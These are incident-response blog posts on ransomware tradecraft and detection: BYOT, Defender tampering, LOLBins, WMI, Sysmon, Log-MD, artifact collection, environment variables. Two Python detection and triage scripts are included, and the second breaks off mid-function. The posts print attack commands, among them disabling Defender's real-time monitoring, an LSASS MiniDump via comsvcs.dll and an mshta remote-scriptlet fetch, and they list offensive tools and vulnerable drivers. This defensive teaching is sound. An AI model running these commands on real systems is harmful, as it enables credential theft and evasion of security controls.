Example of a Darknet Forum Selling Exploits (screenshot)

BYOT: Bring Your Own Tools

The BYOT approach is now a staple in ransomware campaigns. By using cloud-based file-sharing sites like Google Drive, Dropbox, and Box, threat actors can easily bring these tools into a target environment without raising suspicion. It is crucial for organizations to block and alert on these domains to prevent such tactics.
Monitoring & Alerting Domains/URLs: The download locations of the following tools are worth monitoring and alerting on: 7zip, AdFind, Advanced IP Scanner, Angry IP Scanner, AnyDesk, Procdump, Process Hacker, PsTools/PsExec, rclone, and WinSCP (both the portable and the full installer).

Commonly Accessed GitHub Repositories: BloodHound (releases), LaZagne (releases), Mimikatz (releases), PowerSploit/PowerView (releases), PowerUp (releases), Rubeus (source and binary), Seatbelt (source and binary), and SharpView (compiled).

Living Off Trusted Sites (LOTS) Project: mrd0x maintains the Living Off Trusted Sites (LOTS) Project, cataloging sites frequently used for BYOT, data exfiltration, phishing, and other malicious activities. It is essential to monitor and alert on such domains to prevent and detect these activities.

Bypassing Security Software

Once attackers gain initial access, they often need to disable security mechanisms to execute their payloads. Disabling real-time monitoring in Windows Defender, for instance, can be done easily if the attacker has admin privileges:

Set-MpPreference -DisableRealtimeMonitoring $True

Unfortunately, many organizations do not monitor for invocations of Set-MpPreference. Given how easily Defender's real-time monitoring can be disabled, it becomes clear why having a robust backup solution is critical.

Common Bypass Tools & Techniques:
- GMER, Hitman Pro, PC Hunter, Process Hacker: Tools used to disable security mechanisms. Process Hacker, for example, can identify and disable security product services, loaded libraries, and more.
- BYOVD (Bring Your Own Vulnerable Driver): This involves bringing a signed kernel driver into the environment that is vulnerable to attack, providing low-level access for disabling security mechanisms such as AV, EPP, and EDR services.
Common Drivers Used in Ransomware Attacks:
- aswArPot.sys (Avast)
- gdrv.sys (Gigabyte)
- mhyprot2.sys (Genshin Impact)

DLL Hijacking: Wietze Beukema's HijackLibs project offers an overview of DLL hijacking, where legitimate DLLs are replaced or hijacked by malicious actors.

LOLBAS commands: Rather than using a dedicated tool to find and kill security product services and processes, the LOLBAS commands sc, net, and taskkill can do the job.

Service Identification and Termination:
- sc command: For example, sc stop [service_name] can be used to stop a specific service.
- net command: For example, net stop [service_name] will halt the identified service.

Process Identification and Termination:
- Task Manager and the tasklist command: Once a process is identified, taskkill can be used to stop it.

PowerShell Cmdlets:
- Get-Service/Stop-Service: These cmdlets allow administrators (and attackers) to query and stop services, respectively.
- Get-Process/Stop-Process: These cmdlets are used to query and terminate running processes.

LOLBINs & Native Execution Methods

Ransomware actors often use legitimate binaries, also known as LOLBINs (Living Off the Land Binaries), to execute malicious commands:
- regsvr32: Registers DLLs.
- rundll32: Executes functions directly from DLLs.
- bitsadmin: Administers the Background Intelligent Transfer Service (BITS).
- msbuild: CLI compiler for Visual Studio.
- msiexec: Windows Installer for installing programs and tools.
- mshta: Executes HTML Application (HTA) code.
- winrs and wmic: Used for remote command execution.
- wsl: Windows Subsystem for Linux, abused for execution and persistence.

Example Commands:
1. cmd.exe /k [malicious command]
2. powershell.exe -c rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump 4242 C:\WINDOWS\TEMP full
3. regsvr32 c:\users\public\legit.dll
4. mshta.exe vbscript:Close(Execute("GetObject("script:http://1.1.1.1/not_malicious.sct")"))

Windows Management Instrumentation (WMI)

WMI has been around for many years and is commonly used by ransomware actors for persistence and lateral movement. Below are the key components and methods associated with WMI in ransomware cases.

Key WMI Components:
- wmic.exe: General CLI tool to interact with WMI.
- wmiprvse.exe: Service handling WMI commands, often seen in remote WMI activity.
- wsmprovhost.exe: Runs on the remote host if PSRemoting is used.
- mofcomp.exe: MOF (Managed Object Format) compiler used to insert data into the WMI database.

WMI Commands:

wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List

WMI is often used by ransomware actors to launch processes with "Medium" integrity. Some malware calls itself using WMIC via process call create [bad_stuff_here] to elevate privileges on the system.

Detecting WMIC Execution: To detect WMI-based attacks, monitor processes launched by WMIC with medium integrity and unusual invocations. For detailed WMI analysis, collect the WMI database files located at %SystemRoot%\System32\Wbem\Repository\.

Enable WMI Tracing:

wevtutil.exe sl Microsoft-Windows-WMI-Activity/Trace /e:true

WMI Course: A Deep Dive

I've created an in-depth course on WMI, covering its capabilities, stealthy persistence techniques, and how to detect and defend against WMI-based attacks.
Check out the full course below: https://www.cyberengage.org/post/part-1-wmi-a-deep-dive-into-its-capabilities-and-stealthy-persistence-techniques https://www.cyberengage.org/post/part-2-wmi-detecting-and-defending-against-wmi-based-attacks https://www.cyberengage.org/post/part-3-wmi-understanding-wmi-event-consumers-in-cybersecurity https://www.cyberengage.org/post/part-4-wmi-the-intricacies-of-mof-files-a-gateway-for-malicious-infiltration-in-wmi https://www.cyberengage.org/post/part-5-wmi-unveiling-the-persistence-of-malicious-mof-files-a-deep-dive-into-pragma-autorecov https://www.cyberengage.org/post/part-6-wmi-hunting-down-malicious-wmi-activity Akash Patel
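The detections described in this post (Set-MpPreference tampering, sc/net/taskkill/Stop-Service against services, the comsvcs.dll MiniDump trick, mshta and regsvr32 scriptlets, wmic process call create, and a shell whose parent is WmiPrvSE.exe) as a small triage script. This is an added example, not code from the original post or a published tool: it runs over process-creation records expressed as dicts with the Sysmon Event ID 1 field names, the rule set is my own, and the sample events at the bottom are constructed.

```python
"""Triage process-creation records for the security-software tampering,
LOLBin and WMI patterns discussed above.

Added example, not code from the original post.  Records are plain dicts
using the Sysmon Event ID 1 field names (Image, CommandLine, ParentImage);
Security 4688 with command-line auditing maps onto the same fields.
The rule set and the sample events below are constructed for this example.
"""
import re

# (rule name, field the pattern runs over, pattern, optional pattern over ParentImage)
RULES = [
    ("defender-tamper", "CommandLine",
     re.compile(r"Set-MpPreference\b.*-Disable\w+|Add-MpPreference\b.*-Exclusion", re.I), None),
    ("service-stop", "CommandLine",
     re.compile(r"\b(?:sc(?:\.exe)?\s+(?:stop|delete|config)|net1?(?:\.exe)?\s+stop|Stop-Service)\b", re.I), None),
    ("process-kill", "CommandLine",
     re.compile(r"\btaskkill(?:\.exe)?\b.*\s/(?:f|im|pid)\b|\bStop-Process\b", re.I), None),
    ("lsass-minidump", "CommandLine",
     re.compile(r"comsvcs\.dll\s*,\s*MiniDump", re.I), None),
    ("mshta-remote-script", "CommandLine",
     re.compile(r"\bmshta(?:\.exe)?\b.*(?:vbscript:|javascript:|https?://)", re.I), None),
    ("regsvr32-scriptlet", "CommandLine",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*(?:/i:|https?://|\\users\\public\\)", re.I), None),
    ("wmic-process-create", "CommandLine",
     re.compile(r"\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b", re.I), None),
    # Process created through WMI: the parent is the WMI Provider Host, not the real caller.
    ("wmi-spawned-shell", "Image",
     re.compile(r"\\(?:cmd|powershell|pwsh|mshta|rundll32|regsvr32)\.exe$", re.I),
     re.compile(r"\\WmiPrvSE\.exe$", re.I)),
]


def match_rules(event):
    """Return the names of every rule this one event triggers."""
    hits = []
    for name, field, pattern, parent in RULES:
        if not pattern.search(event.get(field, "")):
            continue
        if parent is not None and not parent.search(event.get("ParentImage", "")):
            continue
        hits.append(name)
    return hits


def triage(events):
    """Return [(index, [rule names])] for every event that triggered a rule."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := match_rules(ev))]


SAMPLE_EVENTS = [  # constructed for the example
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Set-MpPreference -DisableRealtimeMonitoring $True",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r"sc stop SomeEndpointAgent",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -c rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump 4242 C:\Windows\Temp\ls.dmp full",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe vbscript:Close(Execute("GetObject(""script:http://1.1.1.1/not_malicious.sct"")"))',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic process call create "C:\Users\Public\update.exe"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",          # the child that wmic above created
     "CommandLine": r"cmd.exe /c whoami",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"Image": r"C:\Windows\System32\taskkill.exe",
     "CommandLine": r"taskkill /F /IM agent.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe",      # benign: must produce no hits
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)} :: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The parent-image rule is the one worth copying: it catches the WMI case regardless of what was launched, because the broken parent-child chain is the artifact, not the command line. Expect tuning on the service-stop rule in environments where administrators script sc stop legitimately; scope it to the service names of your security products.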
- Understanding Infection Vectors in Ransomware Attacks
Ransomware attacks have become increasingly sophisticated, with threat actors leveraging various infection vectors to gain initial access to systems. In this blog, we'll explore three critical infection vectors: RDP (Remote Desktop Protocol), vulnerabilities, and phishing. Understanding these vectors and how they are exploited is crucial to preventing ransomware attacks.

1. Remote Desktop Protocol (RDP)

Why is RDP a major threat?
Lack of awareness: many organizations do not fully recognize the threat posed by RDP exposed to the internet.
Critical servers at risk: RDP is often left open on critical servers, making them easy targets.
Weak security measures: common issues include weak password policies, no Multi-Factor Authentication (MFA), and no lockout policy.
Key consideration: any RDP service exposed to the internet will face constant brute-force attacks. Organizations often avoid lockout policies to prevent legitimate accounts from being locked out, but without one a weak password is only a matter of time.

Tracking RDP via event logs
Use event IDs to monitor RDP activity. Common event IDs associated with RDP use include.

Restricting RDP activity
Group Policy Objects (GPOs): disable RDP on hosts where it is not required.
Firewall rules: block inbound and outbound RDP based on both the port number (3389/TCP by default) and the detected application protocol, since RDP is easily moved to another port.
Security policies: establish and enforce policies that prohibit unnecessary RDP use.
Verification: check firewall logs and Windows event logs, especially from an external-to-internal perspective, to confirm the restrictions actually hold.

2. Exploiting Vulnerabilities

Understanding zero-day attacks
What is a zero-day? A vulnerability that attackers know about, and may already be exploiting, before the vendor has a patch available. Once a patch is released it stops being a zero-day, although it keeps being exploited for as long as systems remain unpatched.
Case study: REvil and Kaseya (2021): the REvil group exploited zero-day vulnerabilities in Kaseya's VSA software and used the product's own update mechanism to push ransomware to the customers of the affected managed service providers, leading to widespread attacks.

Why are exploits successful?
Slow patch cycles: organizations often take too long to patch known vulnerabilities.
Poor asset management: without a solid asset inventory, devices and services go unpatched because nobody knows they exist.
Abandoned services: unused and unpatched services create easy entry points for attackers.
Example of exploits: the Log4Shell vulnerability in 2021 highlighted how an unmonitored third-party library can become a major security risk.
Resources: track the most exploited vulnerabilities via the link below.
https://github.com/fastfire/deepdarkCTI/blob/main/cve_most_exploited.md
Identification: look for contextual evidence when attributing the infection to vulnerability exploitation. An unrelated process running under a service-related process is a red flag: a web server worker, an appliance daemon, or a database service spawning cmd.exe, powershell.exe, or a freshly written binary in a temp directory is a strong sign that the service itself was exploited.

3. Phishing: The Most Common Infection Vector

How phishing works
Email attacks: phishing emails aim to deliver malware or harvest credentials. Stolen credentials are then used to log in to remote services such as VPNs and RDP, which succeeds wherever MFA is not enforced.
Malspam campaigns: these campaigns rely on sheer volume to succeed. Emails may contain malicious attachments (maldocs) or links designed to download malware.

Hunting for phishing attachments
Web browsers: analyze web browser artifacts (the History and Downloads SQLite databases) using tools like DB Browser for SQLite to identify downloaded files.
Outlook content: cached emails and attachments in Outlook are valuable for hunting phishing artifacts. Attachments opened from Outlook are written under %LOCALAPPDATA%\Microsoft\Windows\INetCache\Content.Outlook\, and a process launched by an Office application from that path is a tell-tale sign.
Windows Explorer: look for evidence of ZIP files opened by users (shellbags, LNK files, jump lists), which may have contained the malware.
Windows Registry: the Windows Registry is a veritable cornucopia of data pertaining to user actions within the operating system. If a user opens a maldoc, they may be required to enable macros. Unsurprisingly, many users take this action without question.
When they do, the action is recorded under the Trusted Documents key of the user's hive (HKCU\Software\Microsoft\Office\<version>\<application>\Security\Trusted Documents\TrustRecords), which stores the document's path and the time the user clicked Enable Content.

Phishing links
Direct downloads: some phishing emails bypass DNS-level protection by using raw IP addresses or URL shorteners (e.g., bit.ly, tinyurl).
File sharing sites: attackers often host malicious content on legitimate file-sharing sites like Google Drive or Dropbox, making detection harder.
Mitigation: organizations should block, or at least monitor, access to file-sharing sites and flag suspicious activity.

Additional concepts: the role of CVEs and exploit code in ransomware campaigns

Newly announced CVEs:
Darknet discussions: newly disclosed CVEs are often discussed on darknet forums, where threat actors share and sell exploits.
Rapid spread of POC code: Proof of Concept (POC) code spreads quickly on public platforms like GitHub and through private channels alike. It is not uncommon for ransomware actors to log in to a victim's network, open a web browser, and download tools or POC code from GitHub the same day it becomes available.
Exploits for sale:
Darknet marketplaces: while some security researchers publish POC code publicly, threat actors often develop and sell exploit code on darknet marketplaces. Occasionally researchers purchase this code to bring awareness to the threat, which also shows how accessible such exploits are to malicious actors.
Example: PrintNightmare.

Commodity Malware and Malware as a Service (MaaS)
Commodity malware / infostealers: commonly used in ransomware attacks to gather credentials and system information and lay the groundwork for further exploitation.
MaaS: MaaS has become a significant tool in ransomware campaigns. Families that started as "banking trojans" or "info stealers" have evolved into what are now usually called "loaders," capable of delivering additional payloads onto a compromised machine.
Emotet, a notorious example: Emotet, one of the best-known MaaS families, had a significant impact on the cyber threat landscape. After a coordinated law-enforcement takedown in January 2021 led to its temporary disappearance, the botnet re-emerged in late 2021 and revamped its operations through 2022.
Cryptolaemus: a group of researchers known as "Cryptolaemus" has dedicated itself to combating the Emotet threat. They regularly post information on Emotet campaigns, including IPs and URLs they have detected. https://x.com/Cryptolaemus
Resource for live malware samples: for live samples of various MaaS families and loaders, see https://github.com/jstrosch/malware-samples

Conclusion
Understanding these infection vectors is crucial for building robust defenses against ransomware. By focusing on key areas such as RDP, vulnerabilities, and phishing, organizations can significantly reduce their risk of falling victim to these attacks. Regular monitoring, patching, and enforcing strict security policies are essential steps in this process.
- Enhancing Your Logging Capabilities with Sysmon for ransomware/Any type of attack
Why Sysmon?
Sysmon provides detailed information about process creations, network connections, and changes to file creation time. This can be incredibly valuable for security monitoring, incident response, and forensic investigations. Some key features include:
Process creation monitoring (Event ID 1): essential for tracking the execution of potentially malicious software, including the full command line, hashes and parent process.
Network connection logging (Event ID 3): captures details about outbound and inbound connections, tied to the process that made them.
File creation time changes (Event ID 2): helps identify timestomping, where malware rewrites a file's creation time to blend in.

Installation and Configuration
Installing Sysmon is straightforward. You can download Sysmon from Microsoft's official Sysinternals site, which includes documentation and the executable.
Download Sysmon: get the Sysmon executable from the link provided.
Prepare a configuration file: download a configuration file (e.g., sysmonconfig-export.xml, the name used by SwiftOnSecurity's widely used template). Without a configuration Sysmon logs very little of value, so do not skip this step.
Install Sysmon: execute the following command in an elevated command prompt to install Sysmon with your configuration file:
sysmon.exe -accepteula -i sysmonconfig-export.xml
This installs the Sysmon driver and service, which start logging immediately. To check which configuration is active, run sysmon.exe -c with no file; to update the rules later, run sysmon.exe -c newconfig.xml, which applies the new configuration without reinstalling.

Viewing Sysmon Logs
After installation, Sysmon logs can be found in the Event Viewer under:
Event Viewer (Local) → Applications and Services Logs → Microsoft → Windows → Sysmon → Operational
This location provides easy access to the detailed logs generated by Sysmon.
Recommended Resources
To get the most out of Sysmon, leverage these valuable resources:
Michael Haag's Sysmon repository: this GitHub repo contains a wealth of resources and configurations for Sysmon: https://github.com/MHaggis/sysmon-dfir
Ultimate Windows Event Log Configuration Guide: Yamato Security's guide helps enable specific non-default log types useful for ransomware response: https://github.com/Yamato-Security/EnableWindowsLogSettings
Awesome Event IDs: Mathias Stuhlmacher's curated list of useful event IDs, detailing how to log relevant events: https://github.com/stuhli/awesome-event-ids?tab=readme-ov-file#event-id-databases

Important Logs to Collect
For comprehensive monitoring and threat detection, ensure you are collecting logs from the following sources:
Firewall logs, VPN logs, VMware/Citrix logs, cloud logs, web logs, email logs, DNS logs, database logs

Conclusion
Sysmon helps you monitor, detect, and respond to security threats more effectively. Coupled with the resources and guides mentioned, you can configure Sysmon to meet your specific security needs and improve your overall threat detection and response efforts. Akash Patel
- Enhancing Windows Security with Log-MD
What is Log-MD?
Log-MD is a security tool tailored for Windows systems. It audits log settings and advanced audit policy configurations, guiding users to enable and configure these settings for better security and detection. By gathering artifacts from malicious activity, Log-MD speeds up the investigation process, validates the integrity of systems, and facilitates quicker malware analysis.

Key Features
Audit checks: validates audit settings and ensures they are configured to capture the necessary security events.
Malicious discovery: collects artifacts related to malware, such as process details, file changes, and registry modifications.
Enhanced logging: provides recommendations to improve Windows logging, capturing more detailed and useful data.
Compliance reporting: generates audit reports to show whether systems meet standards like WLCS (Windows Logging Cheat Sheet), CIS, USGCB, and AU ACSC.

Comparing Log-MD Versions
Log-MD comes in three versions: Free, Professional, and Consulting. Feature matrix (✔ = included, – = not included):

Feature | Free | Professional | Consulting
Audit Check | ✔ | ✔ | ✔
Bypass Audit Check | ✔ | ✔ | ✔
PowerShell version and audit log checks | ✔ | ✔ | ✔
WLCS & CIS Compliance | ✔ | ✔ | ✔
USGCB & AU ACSC Compliance | ✔ | ✔ | ✔
Create Audit Report | ✔ | ✔ | ✔
Specify Output Directory | – | ✔ | ✔
Harvest Windows Log Events | ✔ | ✔ | ✔
Process Tree of Parent-Child Processes | – | ✔ | ✔
Custom PowerShell report with configurable settings file to hunt for suspicious PowerShell commands | – | ✔ | ✔
Harvest Sysmon Service Events | – | ✔ | ✔
Whitelist Processes, Command Line, and IPs | ✔ | ✔ | ✔
Whitelist Files, Paths, & Reg Keys | ✔ | ✔ | ✔
Detailed Log Data Reports | 16 | 30 | 30
File Hash Baseline | ✔ | ✔ | ✔
File Hash Compare to Baseline | ✔ | ✔ | ✔
Whitelist by File, Location, or Hash | – | ✔ | ✔
Master-Digest | – | ✔ | ✔
Locked Files Report | ✔ | ✔ | ✔
Locked Files Compare to Baseline | – | ✔ | ✔
Registry Baseline | ✔ | ✔ | ✔
Registry Compare to Baseline | ✔ | ✔ | ✔
Evaluate Imported Hives | ✔ | ✔ | ✔
Whitelist Keys & Values | – | ✔ | ✔
Large Reg Keys Details | ✔ | ✔ | ✔
Load Hives from other systems | ✔ | ✔ | ✔
Large Reg Key Summary | – | ✔ | ✔
WhoIs data for IPs in the IP Connections reports | – | ✔ | ✔
Command line WhoIs lookups of IPv4 addresses | ✔ | ✔ | ✔
Harvest SRUM data - Netflow data by Application (Win 8.1 and 10 only) | – | ✔ | ✔
List of AutoRuns Report | ✔ | ✔ | ✔
AutoRuns exclude results using Master Digest and Whitelist | – | ✔ | ✔
AutoRuns of all WMI namespaces | ✔ | ✔ | ✔
List of Running Processes and Modules Report | ✔ | ✔ | ✔
Running Process and Modules exclude results using Master Digest and Whitelist | – | ✔ | ✔
Query only WMI namespaces | – | ✔ | ✔
VirusTotal lookups of hashes and/or files from reports | – | ✔ | ✔
Automatic VirusTotal lookups when running Autoruns | – | ✔ | ✔
Automatic VirusTotal lookups when checking Running Processes and their modules | – | ✔ | ✔
10 VirusTotal reports can be generated from log reports and Sysmon | – | ✔ | ✔
For Consultants | – | – | ✔
Transferrable 90-Day License | – | – | ✔
Special Artifact Hunting Features | – | ✔ | ✔
Sticky Key Exploit Interesting Artifact Report | – | ✔ | ✔
Null byte in a registry value Interesting Artifact Report | – | ✔ | ✔
Unicode character in filename Interesting Artifact Report | – | ✔ | ✔
Manual pages | 23 | 70 | 70
LOG-MD-Pro Slack Channel Community | – | ✔ | ✔

Here is an example of the detailed output you can expect from Log-MD:

Conclusion
Log-MD is an invaluable tool for anyone tasked with Windows system security. Whether you're a small business or a large enterprise, Log-MD offers a cost-effective solution to enhance your malicious discovery and logging capabilities. Akash Patel
- Tools for Ransomware Analysis and Response
In the world of ransomware analysis and incident response, having the right tools at your disposal can make all the difference.

Manual Collection Tools
Several tools are essential for collecting forensic artifacts, each with capabilities that make them indispensable for incident response:
Kroll Artifact Parser & Extractor (KAPE): simplifies the collection of forensic artifacts. It is versatile and can be run locally on a machine or deployed across an environment using Group Policy Objects (GPOs) in Active Directory, System Center Configuration Manager (SCCM), or other deployment tools.
CyLR: another powerful tool for live response collection. Like KAPE, CyLR can be deployed via GPOs, SCCM, or other methods, making it an excellent choice for comprehensive artifact collection.
Kansa: a PowerShell-driven tool that uses PowerShell sessions (PSSessions) for remote execution. It relies on PowerShell Remoting (PSRemoting), which many organizations disable for security reasons. Enabling PSRemoting should be considered carefully: it widens the remote attack surface and is the same lateral-movement channel ransomware actors use (wsmprovhost.exe on the target is the tell).

Deploying Collection Tools
These tools can be deployed in various ways to ensure they are ready for immediate use when needed:
Local execution: running the tool directly on the machine where the incident occurred.
Remote deployment: using GPOs, SCCM, or other deployment tools to push the tool across the network.
Mounting drives: for "dead disk" analysis, where artifacts are collected from a drive that is not in use. Mount the drive or image read-only and point the collection tool at it.
For those who do not have a software deployment tool, PDQ Deploy is a recommended option.

Avoiding Memory Stomping
It is crucial to have a collection tool or method in place before an incident occurs to avoid memory stomping: every tool you copy onto and run on a live host overwrites freed memory and unallocated disk space that may still hold evidence. Pre-installing the tool across devices mitigates this risk.
Additionally, collecting from Volume Shadow Copies or using a tool like FTK Imager Lite, which reads the raw volume, gets around locked files such as $MFT, the registry hives, and event logs that are held open on a running system.

Learning and Resources
To deepen your understanding of these tools, here are my blogs:
KAPE: https://www.cyberengage.org/post/kape-a-detailed-exploration
CyLR: https://www.cyberengage.org/post/ransomware-analysis-a-examiner-s-guide-part1
Kansa: https://www.cyberengage.org/post/power-of-kansa-a-comprehensive-guide-to-incident-response-and-threat-hunting

Parsing Collected Artifacts
Once artifacts are collected, they need to be parsed. Various tools are available for this purpose, with Eric Zimmerman's suite being a popular choice. There are many other tools available; find the best fit for your needs.

The Best Commercial Tool: Magnet AXIOM
For those seeking an easy-to-use, comprehensive forensics tool for ransomware response, I recommend Magnet's AXIOM.

Scaling Artifact Collection
Collecting artifacts from a single host is straightforward, but when you need to analyze data at scale, it becomes crucial to have efficient tools and methodologies.

Methodologies for Scalable Artifact Collection
1. Secure FTP (SFTP) servers:
Purpose: commonly used to warehouse artifacts collected via deployed tools or scripts. Harden the server: create a dedicated account with write-only access (no read or directory listing) for pushing collections, so that a compromised endpoint holding the credentials cannot read what other hosts uploaded, and keep the server reachable only from inside the environment.
2. KAPE and CyLR: both come with built-in SFTP upload, making it easy to push collections to a server within your environment.
Example commands:
For CyLR:
CyLR.exe -u yourUsername -p yourPassword -s 8.8.8.8:22
For KAPE:
kape.exe --tsource C: --tdest D:\ --target !SANS_Triage --scs [server] --scp [port] --scu [user] --scpw [password] --vhdx [basename]
Caveat: in both cases the password is on the command line, so it is captured by process-creation logging (Sysmon Event ID 1, Security 4688) and shell history on every host the command runs on. Treat the upload account as disposable and rotate it when the collection is done.

Leveraging Velociraptor for Advanced Collection
Velociraptor overview:
Purpose: an advanced digital forensics and incident response tool that enhances visibility into endpoints.
Capabilities: allows remote navigation of file systems, refreshing directories, accessing them live, and performing live parsing of data.
Advantages: versatile and powerful, offering more than just collection.
I haven't delved into Velociraptor yet, but I plan to learn it in the future. Once I have a good grasp of it, I'll create a detailed blog post to help you understand and use this tool effectively.

Conclusion
Being prepared with the right tools and knowledge is essential for effective ransomware analysis and incident response. By leveraging tools like KAPE, CyLR, and Kansa, and deploying them effectively, you can ensure that your response is swift and thorough. For more detailed insights and tool reviews, you can visit the Tool Hub page on my website, where I've created a large number of blogs dedicated to these tools. Akash Patel
- Windows Environment Variables for Ransomware Analysis
Windows environment variables are one such critical component that forensic analysts must be familiar with. These variables function like shortcuts to specific system locations, and they play a pivotal role in both legitimate and malicious activities.

What are Environment Variables?
Environment variables in Windows are dynamic values that the operating system and applications use to determine various settings and locations on the computer. They typically point to directories, system paths, and configuration settings. They can be predefined by the operating system or created by users and administrators.

Common Windows Environment Variables
Here are some commonly used environment variables and their typical paths:
%APPDATA%: the current user's Roaming profile directory. Example: C:\Users\noransom\AppData\Roaming. Used for application data that should roam with the user profile across machines.
%LOCALAPPDATA%: the current user's Local profile directory. Example: C:\Users\noransom\AppData\Local. Data here stays local to the machine and does not roam.
%TEMP%: the temporary files directory. Example: C:\Users\noransom\AppData\Local\Temp. Frequently used by malware as a staging location because any user can write there.
%ComSpec%: the command interpreter executable. Example: C:\Windows\system32\cmd.exe
%ProgramData%: the application data folder shared among all users. Example: C:\ProgramData

Why Environment Variables Matter in Forensics
Environment variables are crucial in forensic investigations for several reasons:
Tracing user activity: by examining the paths pointed to by environment variables, forensic analysts can trace the activities of users on the system. For example, the %APPDATA% directory can contain configuration files and logs of applications that provide insights into user actions.
Identifying malicious behavior: attackers use environment variables to obscure their activity, for example by defining their own variables that point at a payload, or by chaining variables so that the final path never appears as a literal string in any command line.
Streamlining analysis: knowing how to reference environment variables speeds up the forensic process; analysts can jump to the relevant directories and files using these shortcuts.

How Attackers Exploit Environment Variables
Attackers frequently use environment variables to their advantage in several ways:
Persistence mechanisms: malware stores configuration files and executables in directories referenced by %APPDATA% or %TEMP%, which are user-writable and survive reboots, and points Run keys or scheduled tasks at them.
Command obfuscation: by creating and chaining environment variables, attackers can obfuscate their commands. For example, an attacker might create a variable %MALWARE% pointing to the payload and then execute it by referencing %MALWARE%.
Evasion techniques: environment variables help malware evade detection by security mechanisms that match on literal file paths.

Listing Environment Variables
To view all environment variables accessible by your current account, you can use the following commands:
Command Prompt: set
PowerShell: Get-ChildItem env: (ls env: is the alias)
Both show the environment of the current process. Variables that persist across sessions are stored in the registry: user-defined ones in HKCU\Environment and system-wide ones in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment. A variable in those keys that no installed software accounts for is an artifact in its own right.

Practical Example
Let's say an attacker has placed a malicious script in the %APPDATA% directory and is using an environment variable to run it. On the live system you can check where %APPDATA% points by running:
echo %APPDATA%
This displays the full path, helping you navigate to the directory and investigate further. Caveat: run on your analysis workstation, the same command resolves to your own profile, not the victim's. For a collected image, derive the paths from the profile directory under \Users\<name>\ or from the user's hive (HKU\<SID>\Volatile Environment holds APPDATA, LOCALAPPDATA and USERPROFILE for a logged-on user).

Conclusion
These variables provide valuable insights into user activities and are often manipulated by attackers to obfuscate their actions. By familiarizing yourself with common environment variables and how they are used, you can enhance your ability to detect, analyze, and respond to security incidents effectively. Akash Patel
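The resolution problem described in this post, worked as code: expanding %VAR% references the way they would resolve for a specific user on the imaged host rather than on the analyst's own machine, following chained variables, and flagging autostart values that depend on a variable the OS never defines. This is an added example, not code from the original post; the user name noransom, the mount point E:\C, and the recovered MALWARE variable are assumptions made for the example.

```python
"""Resolve Windows environment-variable paths for a user profile taken from an
offline image and flag autostart entries that depend on variables the OS does
not define.  Added example, not code from the original post.  The user name,
mount point and the recovered MALWARE variable below are assumptions.
"""
import re

VAR = re.compile(r"%([^%]+)%")
USER_WRITABLE = ("APPDATA", "LOCALAPPDATA", "TEMP", "PUBLIC", "PROGRAMDATA")
MOUNT = r"E:\C"   # assumed: where the victim's C: volume is mounted on the analysis box


def profile_env(user, system_drive="C:"):
    """The standard variables as they resolve for `user` on the imaged host.
    Paths stay in the victim's own form (C:\\...) so they compare directly
    with literal paths found in the registry."""
    root = f"{system_drive}\\Windows"
    profile = f"{system_drive}\\Users\\{user}"
    return {
        "SYSTEMDRIVE": system_drive,
        "SYSTEMROOT": root,
        "WINDIR": root,
        "PROGRAMDATA": f"{system_drive}\\ProgramData",
        "PROGRAMFILES": f"{system_drive}\\Program Files",
        "PUBLIC": f"{system_drive}\\Users\\Public",
        "USERPROFILE": profile,
        "APPDATA": f"{profile}\\AppData\\Roaming",
        "LOCALAPPDATA": f"{profile}\\AppData\\Local",
        "TEMP": f"{profile}\\AppData\\Local\\Temp",
        "TMP": f"{profile}\\AppData\\Local\\Temp",
        "COMSPEC": f"{root}\\system32\\cmd.exe",
    }


def expand(value, env, extra=None):
    """Expand %VAR% references case-insensitively, as cmd.exe does, using the
    standard set plus `extra` (variables recovered from HKCU\\Environment or
    HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment).
    Returns (expanded, unresolved): unresolved names are the ones no known
    environment defines, i.e. attacker-created or chained variables."""
    lookup = {k.upper(): v for k, v in {**env, **(extra or {})}.items()}
    unresolved = set()

    def sub(m):
        name = m.group(1).upper()
        if name in lookup:
            return lookup[name]
        unresolved.add(m.group(1))
        return m.group(0)        # interactive cmd.exe leaves an unknown %VAR% literally

    for _ in range(8):           # re-run so chained variables resolve; bounded against cycles
        new = VAR.sub(sub, value)
        if new == value:
            break
        value = new
    return value, sorted(unresolved)


def to_mount(path, mount=MOUNT, system_drive="C:"):
    """Rewrite a victim path onto the analyst's mount point so it can be opened."""
    if path.upper().startswith(system_drive.upper()):
        return mount + path[len(system_drive):]
    return path


def review_autoruns(entries, env, extra=None):
    """entries: {value name: command} as read from a Run key.  Returns
    (name, expanded command, reasons) for every entry worth a second look."""
    roots = [env[v].upper() for v in USER_WRITABLE]
    findings = []
    for name, cmd in entries.items():
        expanded, unresolved = expand(cmd, env, extra)
        reasons = []
        if unresolved:
            reasons.append("unknown-variable:" + ",".join(unresolved))
        if any(r in expanded.upper() for r in roots):
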